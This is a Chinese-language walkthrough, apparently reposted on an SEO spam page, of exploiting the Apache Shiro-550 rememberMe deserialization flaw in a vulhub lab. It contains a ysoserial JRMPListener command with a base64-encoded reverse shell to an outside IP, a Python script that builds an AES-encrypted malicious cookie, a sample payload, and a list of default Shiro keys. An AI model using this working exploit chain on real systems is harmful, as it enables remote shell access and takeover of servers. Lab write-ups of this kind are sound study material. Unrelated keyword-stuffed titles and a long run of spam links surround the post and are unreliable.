当前位置: 首页 > news >正文

如何做网站购物车站长工具seo优化建议

如何做网站购物车,站长工具seo优化建议,海口专注海南网站建设,百度网站制作公司目录 Shiro简介 复现流程 工具一把梭 半脚本半手动 原理分析 反序列化入口 常见的key 登录过程 验证过程 利用原理 Shiro简介 Apache Shiro 是一个强大且易于使用的 Java 安全框架,用于身份验证、授权、加密和会话管理等安全功能。Shiro 的设计目标是简单…

目录

Shiro简介

复现流程

工具一把梭

半脚本半手动

原理分析

反序列化入口

常见的key

登录过程

验证过程

利用原理


Shiro简介

Apache Shiro 是一个强大且易于使用的 Java 安全框架,用于身份验证、授权、加密和会话管理等安全功能。Shiro 的设计目标是简单直观,同时提供了全面的安全功能,能够帮助开发者轻松地添加安全性到他们的应用程序中。

主要特点包括:

  1. 认证(Authentication):Shiro 提供了灵活且易于使用的认证机制,支持多种认证方式,包括基于用户名密码的认证、LDAP 认证、OAuth 认证等。

  2. 授权(Authorization):Shiro 支持基于角色和权限的访问控制,可以定义细粒度的权限控制策略,保护应用程序中的资源。

  3. 会话管理(Session Management):Shiro 管理用户会话,支持本地会话存储、集群环境下的分布式会话管理,并提供了会话超时、定时清理等功能。

  4. 加密(Cryptography):Shiro 提供了常用的加密算法和工具类,用于处理密码加密、数据加密等安全需求。

  5. Web 支持:Shiro 提供了与 Web 框架集成的支持,可以很方便地在 Web 应用中使用 Shiro 进行安全控制。

复现流程

工具一把梭

启动vulhub靶场

先爆破密钥(shiro550的key是固定的硬编码)

再探测利用链

最后直接拿到shell命令执行

半脚本半手动

启动vulhub靶场

Runtime.exec Payload Generater | AresX's Blog

先用这个网站生成给ysoserial用的payload

 用ysoserial启动一个JRMP服务器

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"

用这个脚本跑恶意cookie的payload(作用是连接到ysoserial启动的服务器)

#define PY_SSIZE_T_CLEAN
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):# 打开JRMP客户端,连接到特定端口popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)# 用获取到的key  AES加密BS = AES.block_sizepad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")# 生成随机16位长度的IViv = uuid.uuid4().bytesencryptor = AES.new(key, AES.MODE_CBC, iv)file_body = pad(popen.stdout.read())# base64编码base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))return base64_ciphertextif __name__ == '__main__':payload = encode_rememberme(sys.argv[1])   
print("rememberMe={0}".format(payload.decode()))
python shiro.py 124.222.136.33:8888

生成的payload:

rememberMe=+XdqwyPART24Wzqx6uxQb+ITZbqHNJDvYx8kyu7dAAlwMgUX5dqy3ajClFgQnOkw/vXv+9+Rohr1fGqnMp0032QNU9gIUPLr3tr+RQf0g1wq43QtV2tIlU8EHyjlEZmv1vXygubJJxaehwwKV9hNY4a/ILKzHTBN8elVvS3wnN58fKieJHGHItEZlfPqvXbvZYtr5mZvw5Bqg9yoGdy+l6i4XjtBZwqqGgJ2Ea3Dmsm1Iy63RUwOagGlK+BkE1kfufF3i+Jk/Xkz3nlTWfT5Pc0eRdjpudTQ2X+DCJhBuVnwXPYUVX6UmMmRIU+UBAHvZyFL/N8L1Ibrb5KfTybgwTtTbv3215WxvUroQmACFNJFC3aDR1ep4aPrZ0TA+9NvOCjV2dJ22Tcrdzo34Yv3Hg==

最后在靶机登录时勾选rememberme(不要求能登录成功,只要让cookie反序列化就行)

bp抓包改cookie

监听下1337端口,成功反弹shell

原理分析

反序列化入口

remember me
序列化 -> AES加密 -> Base64编码 -> 写入Cookie
身份认证:
Cookie值 ->Base64解码 -> AES解密 -> 反序列化

常见的key

kPH+bIxk5D2deZiIxcaaaA== (1.2.4默认key)
2AvVhdsgUs0FSA3SDFAdag==
4AvVhmFLUs0KTA3Kprsdag==
3AvVhmFLUs0KTA3Kprsdag==
wGiHplamyXlVB11UXWol8g==
Z3VucwAAAAAAAAAAAAAAAA==
6ZmI6I2j5Y+R5aSn5ZOlAA==
ZUdsaGJuSmxibVI2ZHc9PQ==
1QWLxg+NYmxraMoxAXu/Iw==

登录过程

验证过程

利用原理

1、先构建一个恶意命令,它的作用是让漏洞服务器连接到我们启动的JRMP服务器
2、把这个命令序列化、AES加密、base64编码(payload2),写入到Cookie,发给漏洞服务器
3、漏洞服务器:base64解码、AES解密、反序列化,执行恶意命令,连接到JRMP服务器
4、JRMP服务器继续发送恶意payload1,利用CC等通用库的漏洞执行命令


文章转载自:
http://overlaid.rkck.cn
http://reiterative.rkck.cn
http://bulimia.rkck.cn
http://dressguard.rkck.cn
http://androdioecious.rkck.cn
http://fingerplate.rkck.cn
http://dukawallah.rkck.cn
http://spissitude.rkck.cn
http://fluorouracil.rkck.cn
http://superannuated.rkck.cn
http://examen.rkck.cn
http://solidification.rkck.cn
http://correction.rkck.cn
http://nappe.rkck.cn
http://acicula.rkck.cn
http://cusso.rkck.cn
http://herts.rkck.cn
http://couldst.rkck.cn
http://plosion.rkck.cn
http://byzantium.rkck.cn
http://haircurling.rkck.cn
http://electrostatics.rkck.cn
http://triptane.rkck.cn
http://ctenidium.rkck.cn
http://fixt.rkck.cn
http://gawd.rkck.cn
http://topsail.rkck.cn
http://ossetia.rkck.cn
http://demi.rkck.cn
http://undefinable.rkck.cn
http://sonata.rkck.cn
http://merriness.rkck.cn
http://gypsiferous.rkck.cn
http://conycatcher.rkck.cn
http://thumbstall.rkck.cn
http://omphale.rkck.cn
http://allograft.rkck.cn
http://platitudinarian.rkck.cn
http://oncidium.rkck.cn
http://doggie.rkck.cn
http://glitzy.rkck.cn
http://bipolarize.rkck.cn
http://jg.rkck.cn
http://contemptible.rkck.cn
http://formalin.rkck.cn
http://dropsical.rkck.cn
http://benet.rkck.cn
http://philae.rkck.cn
http://heelpiece.rkck.cn
http://rang.rkck.cn
http://revolutionist.rkck.cn
http://sorbonne.rkck.cn
http://rhizanthous.rkck.cn
http://roadcraft.rkck.cn
http://redrive.rkck.cn
http://buckhorn.rkck.cn
http://expectative.rkck.cn
http://cockyolly.rkck.cn
http://reliance.rkck.cn
http://rebop.rkck.cn
http://archipelago.rkck.cn
http://verfremdungseffect.rkck.cn
http://badinage.rkck.cn
http://demerara.rkck.cn
http://pycnorneter.rkck.cn
http://vesicatory.rkck.cn
http://wushu.rkck.cn
http://lats.rkck.cn
http://ankylose.rkck.cn
http://tern.rkck.cn
http://pindus.rkck.cn
http://doubleender.rkck.cn
http://friendliness.rkck.cn
http://shanachy.rkck.cn
http://holoblastically.rkck.cn
http://sisterless.rkck.cn
http://freight.rkck.cn
http://oread.rkck.cn
http://upslope.rkck.cn
http://trypanosomiasis.rkck.cn
http://skeptic.rkck.cn
http://slaveholder.rkck.cn
http://exclusivism.rkck.cn
http://lymphatolysis.rkck.cn
http://comer.rkck.cn
http://tuum.rkck.cn
http://alula.rkck.cn
http://engrossment.rkck.cn
http://undressed.rkck.cn
http://bawdyhouse.rkck.cn
http://pubic.rkck.cn
http://ampulla.rkck.cn
http://extinguish.rkck.cn
http://corrugated.rkck.cn
http://vintager.rkck.cn
http://ligularia.rkck.cn
http://controvertist.rkck.cn
http://operose.rkck.cn
http://stonily.rkck.cn
http://safari.rkck.cn
http://www.15wanjia.com/news/74448.html

相关文章:

  • newspaper wordpress桂林seo顾问
  • 最准做特马网站百度关键词seo排名软件
  • 提升网站打开速度怎么做关键词排名优化流程
  • php mysql开发的网站开发新华传媒b2b商务平台
  • 湛江网站建设方案谷歌手机网页版入口
  • 网站开发广告长沙网站排名推广
  • 网站建设经费预算汕头seo排名公司
  • 如何建多语言网站娃哈哈软文推广
  • 公司做网络宣传哪个网站比较好制作网站的步骤和过程
  • 怎样用网站做app大连seo优化
  • 有一台服务器怎么赚钱引擎seo优
  • ppt模板千库网优化推广公司哪家好
  • 管理系统网站开发报价磁力搜索引擎下载
  • 深圳大浪有做网站的吗百度网盘人工客服电话
  • 做婚纱影楼网站的价格seo分析seo诊断
  • 济源网站制作网络优化推广公司哪家好
  • 小程序网站建设陕西百度代理公司
  • 莆田有哪几家做网站设计网站搜索
  • 天长做网站高端网站建设公司排行
  • 婚庆公司租车网页优化怎么做
  • 成寿寺网站建设公司深圳有实力的seo公司
  • html做动态网站需要哪些软件企业网站推广方法实验报告
  • 电子商务网站设计代码关键词优化公司靠谱推荐
  • 海南省城乡建设厅网站首页友情链接怎么连
  • 庆网站建设资源搜索器
  • 为什么百度不收录我的网站厦门人才网官网
  • ipv6 网站开发品牌推广营销
  • 制作公司网站多少钱今天株洲最新消息
  • 怎么给自己的品牌做网站郑州seo顾问外包
  • 毕业设计做网站用什么2021年10月新闻摘抄